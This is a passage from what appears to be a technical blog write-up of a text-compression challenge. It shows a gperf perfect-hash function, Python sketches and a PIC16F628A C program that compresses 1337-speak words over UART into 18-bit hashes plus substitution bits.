       <span class="mi">64213</span><span class="p">,</span>  <span class="mi">10636</span><span class="p">,</span>   <span class="mi">4410</span><span class="p">,</span>   <span class="mi">1945</span><span class="p">,</span>  <span class="mi">10338</span><span class="p">,</span>   <span class="mi">2786</span><span class="p">,</span>  <span class="mi">42248</span><span class="p">,</span>  <span class="mi">14110</span><span class="p">,</span>   <span class="mi">9063</span><span class="p">,</span>  <span class="mi">51277</span><span class="p">,</span>
           <span class="mi">5</span><span class="p">,</span>   <span class="mi">1385</span><span class="p">,</span>    <span class="mi">330</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span>
      <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span>
      <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span>
      <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span>
    <span class="p">};</span>
  <span class="k">register</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">hval</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

  <span class="k">switch</span> <span class="p">(</span><span class="n">len</span><span class="p">)</span>
    <span class="p">{</span>
      <span class="nl">default:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">10</span><span class="p">]];</span>
      <span class="cm">/*FALLTHROUGH*/</span>
      <span class="k">case</span> <span class="mi">10</span><span class="p">:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">9</span><span class="p">]];</span>
      <span class="cm">/*FALLTHROUGH*/</span>
      <span class="k">case</span> <span class="mi">9</span><span class="p">:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">8</span><span class="p">]];</span>
      <span class="cm">/*FALLTHROUGH*/</span>
      <span class="k">case</span> <span class="mi">8</span><span class="p">:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">7</span><span class="p">]];</span>
      <span class="cm">/*FALLTHROUGH*/</span>
      <span class="k">case</span> <span class="mi">7</span><span class="p">:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">6</span><span class="p">]];</span>
      <span class="cm">/*FALLTHROUGH*/</span>
      <span class="k">case</span> <span class="mi">6</span><span class="p">:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span><span class="o">+</span><span class="mi">3</span><span class="p">];</span>
      <span class="cm">/*FALLTHROUGH*/</span>
      <span class="k">case</span> <span class="mi">5</span><span class="p">:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span><span class="o">+</span><span class="mi">19</span><span class="p">];</span>
      <span class="cm">/*FALLTHROUGH*/</span>
      <span class="k">case</span> <span class="mi">4</span><span class="p">:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span><span class="o">+</span><span class="mi">13</span><span class="p">];</span>
      <span class="cm">/*FALLTHROUGH*/</span>
      <span class="k">case</span> <span class="mi">3</span><span class="p">:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span><span class="o">+</span><span class="mi">29</span><span class="p">];</span>
      <span class="cm">/*FALLTHROUGH*/</span>
      <span class="k">case</span> <span class="mi">2</span><span class="p">:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">1</span><span class="p">]];</span>
      <span class="cm">/*FALLTHROUGH*/</span>
      <span class="k">case</span> <span class="mi">1</span><span class="p">:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">+</span><span class="mi">42</span><span class="p">];</span>
        <span class="k">break</span><span class="p">;</span>
    <span class="p">}</span>
  <span class="k">return</span> <span class="n">hval</span> <span class="o">+</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="n">len</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]];</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Over our wordlist, the maximum hash value is 206123, which can be comfortably encoded in 18 bits (2<sup>18</sup> = 262144). Simulating this, we find that this should compress to around 734 bytes per message on average, giving a score of <strong>1314</strong> - far better than the Huffman approach!</p>
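<p>The simulation itself isn’t shown here; a rough sketch of how such an estimate might be computed follows, reusing the accounting from the earlier script (one hash per word plus one bit per 1337-speakable character). The name <code class="language-plaintext highlighter-rouge">estimated_size</code> is hypothetical, and the sketch ignores the special handling of the truncated final word.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import re

# Letters that can be swapped for digits, plus the digits they turn into.
LEET_CHARS = re.compile(r"[ABEGIOSTZ483610572]")

MAX_HASH = 206123
HASH_BITS = MAX_HASH.bit_length()  # width needed to hold the largest hash value

def estimated_size(text, bits_per_word):
    """Estimated output size in bytes for one message."""
    word_bits = len(text.split()) * bits_per_word
    leet_bits = len(LEET_CHARS.findall(text))
    return (word_bits + leet_bits + 7) // 8

sample = "RE4LLY RUG C1TI35 633K"
print(HASH_BITS, estimated_size(sample, 13), estimated_size(sample, HASH_BITS))
</code></pre></div></div>

<p>Averaging <code class="language-plaintext highlighter-rouge">estimated_size</code> over many generated 2048-byte messages and subtracting the result from 2048 gives the estimated score.</p>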

<p>Instead of writing this in PIC assembly, I chose to use Microchip’s XC8 C compiler. I converted the provided startup code to C in order to get the UART to work. Since we’re working with a very small amount of memory, I chose the smallest possible data types to save space, making use of Microchip’s special <code class="language-plaintext highlighter-rouge">uint24_t</code> 3-byte integer type to save even more space.</p>

<p>The implementation itself is relatively straightforward: we accumulate the hash and “1337 bits” as each plaintext character comes in, then flush the hash and any accumulated 1337 bits when we see a space character. Once at least 2028 input characters have arrived, the next space (whose word is still hashed as usual) switches us to encoding the remaining characters directly at 8 bits each. This avoids problems with a truncated final word: the longest word in the wordlist is 18 characters, so that space should always arrive before the 2048-character input ends.</p>
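
<p>As a rough model of the “1337 bits” bookkeeping, here is a minimal Python sketch that mirrors the digit and letter handling in the C code further down. The helper names <code class="language-plaintext highlighter-rouge">split_leet</code> and <code class="language-plaintext highlighter-rouge">join_leet</code> are made up for illustration, and the sketch ignores hashing entirely:</p>

```python
LEET_MAP = "OIZEASGTB"  # digit d stands for LEET_MAP[d], same order as the C leet_map table


def split_leet(word):
    """Return (plain_word, leet_bits, leet_count) for one 1337-encoded word."""
    plain = []
    leet_bits = 0
    leet_count = 0
    for ch in word:
        if "0" <= ch <= "8":
            # a digit: restore the letter and record a 1 bit
            ch = LEET_MAP[int(ch)]
            leet_bits |= 1 << leet_count
            leet_count += 1
        elif ch in LEET_MAP:
            # a letter that could have been a digit: record a 0 bit
            leet_count += 1
        plain.append(ch)
    return "".join(plain), leet_bits, leet_count


def join_leet(plain, leet_bits):
    """Inverse of split_leet: re-apply the recorded bits to a plain word."""
    out = []
    i = 0
    for ch in plain:
        if ch in LEET_MAP:
            if (leet_bits >> i) & 1:
                ch = str(LEET_MAP.index(ch))
            i += 1
        out.append(ch)
    return "".join(out)


print(split_leet("N3TW0RK"))
print(join_leet("NETWORK", 0b101))
```

<p>Here <code class="language-plaintext highlighter-rouge">N3TW0RK</code> splits into <code class="language-plaintext highlighter-rouge">NETWORK</code> with three flag bits (for E, T and O), so the word costs 18 + 3 = 21 bits instead of the 64 bits needed to send seven characters and a space verbatim.</p>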

<p>Here’s what the PIC code looks like. This is compiled with <code class="language-plaintext highlighter-rouge">xc8-cc -mcpu=pic16f628a -O2</code>:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;xc.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdint.h&gt;</span><span class="cp">
</span>
<span class="c1">// disable the watchdog timer</span>
<span class="cp">#pragma config WDTE = OFF
</span>
<span class="k">static</span> <span class="kt">uint8_t</span> <span class="n">txbuf</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span>
<span class="k">static</span> <span class="kt">uint8_t</span> <span class="n">txcnt</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="k">static</span> <span class="kt">void</span> <span class="nf">send_byte</span><span class="p">(</span><span class="kt">uint8_t</span> <span class="n">b</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">txbuf</span><span class="p">[</span><span class="n">txcnt</span><span class="p">]</span> <span class="o">=</span> <span class="n">b</span><span class="p">;</span>
    <span class="n">txcnt</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">uint16_t</span> <span class="n">total_rx_count</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">static</span> <span class="kt">uint8_t</span> <span class="n">is_tail</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="k">static</span> <span class="kt">uint8_t</span> <span class="n">word_len</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">static</span> <span class="kt">uint8_t</span> <span class="n">last_char</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">static</span> <span class="n">uint24_t</span> <span class="n">cur_hash</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">static</span> <span class="n">uint24_t</span> <span class="n">leet_bits</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">static</span> <span class="kt">uint8_t</span> <span class="n">leet_count</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// compressed form of the gperf table, removing unreachable entries</span>
<span class="k">static</span> <span class="k">const</span> <span class="kt">uint16_t</span> <span class="n">asso_values</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">145</span><span class="p">,</span> <span class="mi">22134</span><span class="p">,</span> <span class="mi">14665</span><span class="p">,</span> <span class="mi">7025</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">43498</span><span class="p">,</span> <span class="mi">6070</span><span class="p">,</span> <span class="mi">2551</span><span class="p">,</span> <span class="mi">60</span><span class="p">,</span> <span class="mi">13988</span><span class="p">,</span> <span class="mi">38948</span><span class="p">,</span> <span class="mi">1820</span><span class="p">,</span> <span class="mi">30148</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">85</span><span class="p">,</span> <span class="mi">6351</span><span class="p">,</span> <span class="mi">5350</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">65</span><span class="p">,</span> <span class="mi">555</span><span class="p">,</span> <span class="mi">14565</span><span class="p">,</span> <span class="mi">2027</span><span class="p">,</span> <span class="mi">295</span><span class="p">,</span> <span class="mi">735</span><span class="p">,</span> <span class="mi">45643</span><span class="p">,</span> <span class="mi">29266</span><span class="p">,</span> <span class="mi">7705</span><span class="p">,</span> <span class="mi">42888</span><span class="p">,</span> <span class="mi">10966</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">4875</span><span class="p">,</span> <span class="mi">325</span><span class="p">,</span> <span class="mi">4725</span><span class="p">,</span> <span 
class="mi">53578</span><span class="p">,</span> <span class="mi">57958</span><span class="p">,</span> <span class="mi">14261</span><span class="p">,</span> <span class="mi">1220</span><span class="p">,</span> <span class="mi">29394</span><span class="p">,</span> <span class="mi">60128</span><span class="p">,</span> <span class="mi">26679</span><span class="p">,</span> <span class="mi">45243</span><span class="p">,</span> <span class="mi">275</span><span class="p">,</span> <span class="mi">2250</span><span class="p">,</span> <span class="mi">1350</span><span class="p">,</span> <span class="mi">23954</span><span class="p">,</span> <span class="mi">585</span><span class="p">,</span> <span class="mi">430</span><span class="p">,</span> <span class="mi">90</span><span class="p">,</span> <span class="mi">35098</span><span class="p">,</span> <span class="mi">11101</span><span class="p">,</span> <span class="mi">49537</span><span class="p">,</span> <span class="mi">401</span><span class="p">,</span> <span class="mi">51258</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">64213</span><span class="p">,</span> <span class="mi">10636</span><span class="p">,</span> <span class="mi">4410</span><span class="p">,</span> <span class="mi">1945</span><span class="p">,</span> <span class="mi">10338</span><span class="p">,</span> <span class="mi">2786</span><span class="p">,</span> <span class="mi">42248</span><span class="p">,</span> <span class="mi">14110</span><span class="p">,</span> <span class="mi">9063</span><span class="p">,</span> <span class="mi">51277</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">1385</span><span class="p">,</span> <span class="mi">330</span><span class="p">};</span>
<span class="c1">// offsets applied to each character to get the asso_values index</span>
<span class="k">static</span> <span class="k">const</span> <span class="kt">int8_t</span> <span class="n">asso_offs</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="o">-</span><span class="mi">23</span><span class="p">,</span> <span class="o">-</span><span class="mi">65</span><span class="p">,</span> <span class="o">-</span><span class="mi">36</span><span class="p">,</span> <span class="o">-</span><span class="mi">52</span><span class="p">,</span> <span class="o">-</span><span class="mi">46</span><span class="p">,</span> <span class="o">-</span><span class="mi">62</span><span class="p">,</span> <span class="o">-</span><span class="mi">65</span><span class="p">,</span> <span class="o">-</span><span class="mi">65</span><span class="p">,</span> <span class="o">-</span><span class="mi">65</span><span class="p">,</span> <span class="o">-</span><span class="mi">65</span><span class="p">,</span> <span class="o">-</span><span class="mi">65</span><span class="p">};</span>
<span class="c1">// offset applied to the final character</span>
<span class="cp">#define asso_final_off (-65)
</span><span class="k">static</span> <span class="k">const</span> <span class="kt">uint8_t</span> <span class="n">leet_map</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span> <span class="sc">'O'</span><span class="p">,</span> <span class="sc">'I'</span><span class="p">,</span> <span class="sc">'Z'</span><span class="p">,</span> <span class="sc">'E'</span><span class="p">,</span> <span class="sc">'A'</span><span class="p">,</span> <span class="sc">'S'</span><span class="p">,</span> <span class="sc">'G'</span><span class="p">,</span> <span class="sc">'T'</span><span class="p">,</span> <span class="sc">'B'</span> <span class="p">};</span>

<span class="k">static</span> <span class="kt">uint8_t</span> <span class="n">cur_byte</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">static</span> <span class="kt">uint8_t</span> <span class="n">cur_bit</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="k">static</span> <span class="kt">void</span> <span class="nf">push_bits</span><span class="p">(</span><span class="n">uint24_t</span> <span class="n">x</span><span class="p">,</span> <span class="kt">uint8_t</span> <span class="n">nbits</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">while</span><span class="p">(</span><span class="n">nbits</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">uint8_t</span> <span class="n">cur</span> <span class="o">=</span> <span class="n">nbits</span><span class="p">;</span>
        <span class="k">if</span><span class="p">(</span><span class="n">cur</span> <span class="o">&gt;</span> <span class="p">(</span><span class="mi">8</span> <span class="o">-</span> <span class="n">cur_bit</span><span class="p">))</span> <span class="p">{</span>
            <span class="n">cur</span> <span class="o">=</span> <span class="mi">8</span> <span class="o">-</span> <span class="n">cur_bit</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="n">cur_byte</span> <span class="o">|=</span> <span class="p">((</span><span class="kt">uint8_t</span><span class="p">)</span><span class="n">x</span><span class="p">)</span> <span class="o">&lt;&lt;</span> <span class="n">cur_bit</span><span class="p">;</span>
        <span class="n">cur_bit</span> <span class="o">+=</span> <span class="n">cur</span><span class="p">;</span>
        <span class="n">nbits</span> <span class="o">-=</span> <span class="n">cur</span><span class="p">;</span>
        <span class="n">x</span> <span class="o">&gt;&gt;=</span> <span class="n">cur</span><span class="p">;</span>
        <span class="k">if</span><span class="p">(</span><span class="n">cur_bit</span> <span class="o">==</span> <span class="mi">8</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">send_byte</span><span class="p">(</span><span class="n">cur_byte</span><span class="p">);</span>
            <span class="n">cur_byte</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
            <span class="n">cur_bit</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">void</span> <span class="nf">process_char</span><span class="p">(</span><span class="kt">uint8_t</span> <span class="n">c</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">total_rx_count</span><span class="o">++</span><span class="p">;</span>
    <span class="k">if</span><span class="p">(</span><span class="n">is_tail</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// this could be more efficient (e.g. 6 bit or entropy encoding)</span>
        <span class="c1">// but we're only using it for at most 20 input characters</span>
        <span class="n">push_bits</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="mi">8</span><span class="p">);</span>
        <span class="k">if</span><span class="p">(</span><span class="n">total_rx_count</span> <span class="o">==</span> <span class="mi">2048</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">push_bits</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">8</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">if</span><span class="p">(</span><span class="n">c</span> <span class="o">==</span> <span class="sc">' '</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">if</span><span class="p">(</span><span class="n">total_rx_count</span> <span class="o">&gt;=</span> <span class="mi">2028</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">is_tail</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="n">cur_hash</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[</span><span class="n">last_char</span> <span class="o">+</span> <span class="n">asso_final_off</span><span class="p">];</span>
        <span class="n">push_bits</span><span class="p">(</span><span class="n">cur_hash</span><span class="p">,</span> <span class="mi">18</span><span class="p">);</span>
        <span class="k">if</span><span class="p">(</span><span class="n">leet_count</span><span class="p">)</span>
            <span class="n">push_bits</span><span class="p">(</span><span class="n">leet_bits</span><span class="p">,</span> <span class="n">leet_count</span><span class="p">);</span>

        <span class="n">word_len</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="n">last_char</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="n">cur_hash</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="n">leet_bits</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="n">leet_count</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="cm">/* regular word character */</span>
    <span class="k">if</span><span class="p">(</span><span class="n">c</span> <span class="o">&gt;=</span> <span class="sc">'0'</span> <span class="o">&amp;&amp;</span> <span class="n">c</span> <span class="o">&lt;=</span> <span class="sc">'8'</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">c</span> <span class="o">=</span> <span class="n">leet_map</span><span class="p">[</span><span class="n">c</span> <span class="o">-</span> <span class="sc">'0'</span><span class="p">];</span>
        <span class="n">leet_bits</span> <span class="o">|=</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="n">leet_count</span><span class="p">);</span>
        <span class="n">leet_count</span><span class="o">++</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="k">if</span><span class="p">(</span><span class="n">c</span> <span class="o">==</span> <span class="sc">'A'</span> <span class="o">||</span> <span class="n">c</span> <span class="o">==</span> <span class="sc">'B'</span> <span class="o">||</span> <span class="n">c</span> <span class="o">==</span> <span class="sc">'E'</span> <span class="o">||</span> <span class="n">c</span> <span class="o">==</span> <span class="sc">'G'</span> <span class="o">||</span> <span class="n">c</span> <span class="o">==</span> <span class="sc">'I'</span> <span class="o">||</span> <span class="n">c</span> <span class="o">==</span> <span class="sc">'O'</span> <span class="o">||</span> <span class="n">c</span> <span class="o">==</span> <span class="sc">'S'</span> <span class="o">||</span> <span class="n">c</span> <span class="o">==</span> <span class="sc">'T'</span> <span class="o">||</span> <span class="n">c</span> <span class="o">==</span> <span class="sc">'Z'</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">leet_count</span><span class="o">++</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">if</span><span class="p">(</span><span class="n">word_len</span> <span class="o">&lt;=</span> <span class="mi">10</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">cur_hash</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[</span><span class="n">c</span> <span class="o">+</span> <span class="n">asso_offs</span><span class="p">[</span><span class="n">word_len</span><span class="p">]];</span>
    <span class="p">}</span>
    <span class="n">word_len</span><span class="o">++</span><span class="p">;</span>
    <span class="n">last_char</span> <span class="o">=</span> <span class="n">c</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">__interrupt</span><span class="p">()</span> <span class="n">main_irq</span><span class="p">()</span> <span class="p">{</span>
    <span class="k">if</span><span class="p">(</span><span class="n">PIR1bits</span><span class="p">.</span><span class="n">RCIF</span><span class="p">)</span> <span class="p">{</span>
        <span class="cm">/* rx interrupt */</span>
        <span class="kt">uint8_t</span> <span class="n">c</span> <span class="o">=</span> <span class="n">RCREG</span><span class="p">;</span>
        <span class="n">PIR1bits</span><span class="p">.</span><span class="n">RCIF</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="n">process_char</span><span class="p">(</span><span class="n">c</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
    <span class="c1">// globally enable interrupts</span>
    <span class="n">INTCONbits</span><span class="p">.</span><span class="n">GIE</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
    <span class="n">INTCONbits</span><span class="p">.</span><span class="n">PEIE</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>

    <span class="c1">// configure uart and transmitter</span>
    <span class="n">TRISB</span> <span class="o">=</span> <span class="mh">0x06</span><span class="p">;</span>
    <span class="n">SPBRG</span> <span class="o">=</span> <span class="mi">32</span><span class="p">;</span>
    <span class="n">TXSTAbits</span><span class="p">.</span><span class="n">SYNC</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">RCSTAbits</span><span class="p">.</span><span class="n">SPEN</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
    <span class="n">TXSTAbits</span><span class="p">.</span><span class="n">TXEN</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>

    <span class="c1">// configure uart receiver</span>
    <span class="n">PIE1bits</span><span class="p">.</span><span class="n">RCIE</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
    <span class="n">RCSTAbits</span><span class="p">.</span><span class="n">CREN</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>

    <span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">while</span><span class="p">(</span><span class="o">!</span><span class="n">TXSTAbits</span><span class="p">.</span><span class="n">TRMT</span><span class="p">)</span>
            <span class="p">;</span>
        <span class="k">while</span><span class="p">(</span><span class="o">!</span><span class="n">txcnt</span><span class="p">)</span>
            <span class="p">;</span>
        <span class="n">TXREG</span> <span class="o">=</span> <span class="n">txbuf</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
        <span class="n">txcnt</span><span class="o">--</span><span class="p">;</span>
        <span class="k">for</span><span class="p">(</span><span class="kt">uint8_t</span> <span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="n">i</span><span class="o">&lt;</span><span class="n">txcnt</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
            <span class="n">txbuf</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">txbuf</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">];</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

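<p>One feature to note is that we buffer and send bytes asynchronously: output is only produced when a space character arrives, and a single word can emit up to 36 bits at once (an 18-bit hash plus up to 18 “1337 bits”). The receive interrupt queues completed bytes in <code class="language-plaintext highlighter-rouge">txbuf</code>, and the main loop sends them one at a time whenever the transmitter is idle.</p>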
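
<p>To make the bit layout concrete, here is a small Python model of the LSB-first packing done by <code class="language-plaintext highlighter-rouge">push_bits</code>, together with a matching reader. The <code class="language-plaintext highlighter-rouge">BitWriter</code> class and <code class="language-plaintext highlighter-rouge">read_bits</code> function are illustrative names, not part of the challenge code, and the model assumes every value fits in the number of bits requested:</p>

```python
class BitWriter:
    """Packs values LSB-first into bytes, modelled on push_bits in the C code."""

    def __init__(self):
        self.out = bytearray()
        self.cur_byte = 0
        self.cur_bit = 0

    def push_bits(self, x, nbits):
        while nbits:
            # take as many bits as still fit in the current byte
            cur = min(nbits, 8 - self.cur_bit)
            self.cur_byte |= (x & ((1 << cur) - 1)) << self.cur_bit
            self.cur_bit += cur
            nbits -= cur
            x >>= cur
            if self.cur_bit == 8:
                self.out.append(self.cur_byte)
                self.cur_byte = 0
                self.cur_bit = 0


def read_bits(data, pos, nbits):
    """Read nbits starting at bit offset pos (LSB-first); returns (value, new_pos)."""
    value = 0
    for i in range(nbits):
        byte = data[(pos + i) >> 3]
        value |= ((byte >> ((pos + i) & 7)) & 1) << i
    return value, pos + nbits


w = BitWriter()
w.push_bits(206123, 18)  # an 18-bit hash
w.push_bits(0b101, 3)    # three 1337 bits
w.push_bits(0, 8)        # padding so the last partial byte is emitted
hash_value, pos = read_bits(w.out, 0, 18)
leet_value, pos = read_bits(w.out, pos, 3)
print(hash_value, leet_value, len(w.out))
```

<p>A single 36-bit flush, on top of up to 7 bits already pending in <code class="language-plaintext highlighter-rouge">cur_byte</code>, completes at most five bytes, which fits in the 8-byte <code class="language-plaintext highlighter-rouge">txbuf</code> as long as the main loop has drained the earlier bytes.</p>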

<p>This is a very space-efficient compressor, using only 583 words of program memory (28.5%) and 51 bytes of RAM (22.8%). Here’s a sample compressed output corresponding to the sample input above (748 bytes); note that it’s a bit larger than predicted because the tail is encoded rather inefficiently, costing up to 21 bytes (up to 20 raw trailing characters plus one padding byte that flushes the last partial byte):</p>

